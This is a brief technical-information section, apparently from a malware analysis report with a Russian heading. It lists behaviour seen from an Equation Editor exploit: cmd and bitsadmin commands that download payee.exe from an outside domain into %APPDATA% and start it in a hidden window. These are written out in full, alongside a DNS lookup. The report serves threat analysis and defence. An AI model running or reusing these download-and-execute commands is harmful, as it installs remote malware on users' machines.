Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer RT /priority foreground http://clean-pro.com.ua/payee.exe %APPDATA%\MPK.exe && start %APPDATA%\MPK.exe
- DNS ASK cl####pro.com.ua
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer RT /priority foreground http://clean-pro.com.ua/payee.exe %APPDATA%\MPK.exe && start %APPDATA%\MPK.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer RT /priority foreground http://clean-pro.com.ua/payee.exe %APPDATA%\MPK.exe